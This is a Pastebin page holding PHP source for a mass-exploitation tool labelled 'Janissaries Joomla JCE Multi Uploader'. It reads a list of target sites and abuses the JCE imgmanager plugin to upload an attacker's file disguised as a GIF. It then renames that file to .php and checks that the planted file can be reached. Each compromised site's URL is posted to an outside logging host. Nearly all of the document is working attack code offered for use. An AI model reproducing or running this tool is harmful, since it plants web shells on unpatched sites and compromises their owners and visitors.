API tools faq
paste
Advertisement
Guest User

decoded by mehdi

a guest
Mar 20th, 2013
423
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.79 KB | None | 0 0
raw download clone embed print report
  1. <title>Janissaries Joomla JCE Multi Uploader</title>
  2. <form method="post" action="" enctype="multipart/form-data">
  3. <h1 style="color:#333;font:19px myriad pro;margin:0;padding:0;">Janissaries Joomla JCE Multi Uploader - PrivFuckin8 - Coded by Miyachung - <a href="http://janissaries.org/" style="font:18px myriad pro;color:#333">Janissaries\'e GÄ°T!</a></h1><br />
  4. <table>
  5.     <tr>
  6.     <td>Siteler</td><td>:</td><td><textarea style="width:500px;height:150px;resize:none" name="siteler"></textarea></td>
  7.     </tr>
  8.     <tr>
  9.     <td>Dosya</td><td>:</td><td><input type="file" name="dosya" /></td>
  10.     </tr>
  11.     <tr>
  12.     <td></td><td></td><td><input type="submit" value="Fuck\'them" /></td>
  13.     </tr>
  14. </table>
  15. </form>
  16. ';
  17. set_time_limit(0);
  18. ini_set("max_execution_time",0);
  19. ob_implicit_flush(1);
  20. ini_set("default_socket_timeout",1);
  21. if($_POST)
  22. {
  23. $jce        = new jce;
  24. $siteler    = $_POST['siteler'];
  25. $siteler    = explode("\n",$siteler);
  26. foreach($siteler as $host)
  27. {
  28. $host    = trim($host);
  29. $host    = str_replace("http://","",$host);
  30. echo "=> Denenen site: <strong>$host</strong><br />";
  31. flush();@ob_flush();
  32. $curl = curl_init();
  33. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  34. curl_setopt($curl,CURLOPT_URL,"http://$host/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20");
  35. curl_setopt($curl,CURLOPT_USERAGENT,"BOT/0.1 (BOT for JCE)");
  36. curl_setopt($curl,CURLOPT_TIMEOUT,13);
  37. $exec = curl_exec($curl);
  38. curl_close($curl);
  39. $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
  40. $count = 0;
  41. foreach ($str as $value){
  42. $pos = strpos($exec,$value);
  43. if ($pos === false) {
  44. $count=$count++;
  45. }
  46. }
  47. if ($count=10){echo '=> <font color="red">Site açıklı,dosya yükleniyor</font><br/>';flush();@ob_flush();}else{echo '=> Site açıksız<br/>';flush();@ob_flush();}
  48. $filename = "miya".rand(1,200).".gif";
  49. $content = "GIF89a1\n";
  50. $content .= file_get_contents($_FILES['dosya']['tmp_name']);
  51. $data    = "-----------------------------41184676334\r\n";
  52. $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
  53. $data   .= "/\r\n";
  54. $data   .= "-----------------------------41184676334\r\n";
  55. $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
  56. $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
  57. $data   .= "-----------------------------41184676334\r\n";
  58. $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
  59. $data   .= "0\r\n";
  60. $data   .= "-----------------------------41184676334\r\n";
  61. $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"".$filename."\"\r\n";
  62. $data   .= "Content-Type: image/gif\r\n\r\n";
  63. $data   .= "$content\r\n";
  64. $data   .= "-----------------------------41184676334\r\n";
  65. $data   .= "xxxy\r\n";
  66. $data   .= "-----------------------------41184676334\r\n";
  67. $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
  68. $data   .= "upload\r\n";
  69. $data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
  70. $packet  = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
  71. $packet .= "Host: ".$host."\r\n";
  72. $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
  73. $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
  74. $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  75. $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  76. $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
  77. $packet .= "Connection: Close\r\n";
  78. $packet .= "Proxy-Connection: close\r\n";
  79. $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
  80. $packet .= $data;
  81. $jce->sendpacket($host,$packet,0,0);
  82. $filephp = str_replace("gif","php",$filename);
  83. $packet  = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
  84. $packet .= "Host: ".$host."\r\n";
  85. $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
  86. $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  87. $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
  88. $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  89. $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
  90. $packet .= "Accept-Encoding: deflate\n";
  91. $packet .= "X-Request: JSON\r\n";
  92. $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
  93. $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/".$filename."\",\"".$filephp."\"]}";
  94. $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
  95. $packet .= $ren."\r\n\r\n";
  96. $jce->sendpacket($host,$packet,1,0);
  97. $kontrol = $jce->uploadkontrolZenci("http://".$host."/images/stories/".$filephp);
  98. if($kontrol)
  99. {
  100. echo "=> Dosya başarıyla yüklendi -> <a href='http://$host/images/stories/$filephp'>http://$host/images/stories/$filephp</a><br />";
  101. $jce->logyollaZenci("http://".$host."/images/stories/".$filephp);
  102. }else{echo "=> Bir sorun oluştu,dosya yüklenemedi!<br />";}
  103. }
  104. }
  105. class jce
  106. {
  107. public function sendpacket($host,$packet,$response = 0,$output = 0)
  108. {
  109. $ock = fsockopen($host,80);
  110. stream_set_timeout($ock,1);
  111. if (!$ock)
  112. {
  113. echo '=> Siteye bağlanılamadı<br/>';
  114. }
  115. fputs($ock,$packet);
  116. if ($response == 1)
  117. {
  118. $html = '';
  119. while (!feof($ock))
  120. {
  121. $html .= fgets($ock);
  122. }
  123. }else $html = '';
  124. fclose($ock);
  125. if ($response == 1 &&$output == 1) echo nl2br(htmlentities($html));
  126. }
  127. public function uploadkontrolZenci($site)
  128. {
  129. $curl = curl_init();
  130. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  131. curl_setopt($curl,CURLOPT_URL,$site);
  132. curl_setopt($curl,CURLOPT_USERAGENT,"BOT/0.1 (BOT for JCE)");
  133. curl_setopt($curl,CURLOPT_TIMEOUT,15);
  134. $exec = curl_exec($curl);
  135. curl_close($curl);
  136. if(preg_match('/GIF89a1/si',$exec))
  137. {
  138. return true;
  139. }else{return false;}
  140. }
  141. public function logyollaZenci($log)
  142. {
  143. $curl = curl_init();
  144. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  145. curl_setopt($curl,CURLOPT_URL,"http://burtay.org/dosylar/jce/kaydet.php");
  146. curl_setopt($curl,CURLOPT_POST,1);
  147. curl_setopt($curl,CURLOPT_POSTFIELDS,"site=".urlencode($log)."");
  148. curl_setopt($curl,CURLOPT_USERAGENT,"BOT/0.1 (BOT for JCE)");
  149. curl_setopt($curl,CURLOPT_TIMEOUT,15);
  150. $exec = curl_exec($curl);
  151. curl_close($curl);
  152. return $exec;
  153. }
  154. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!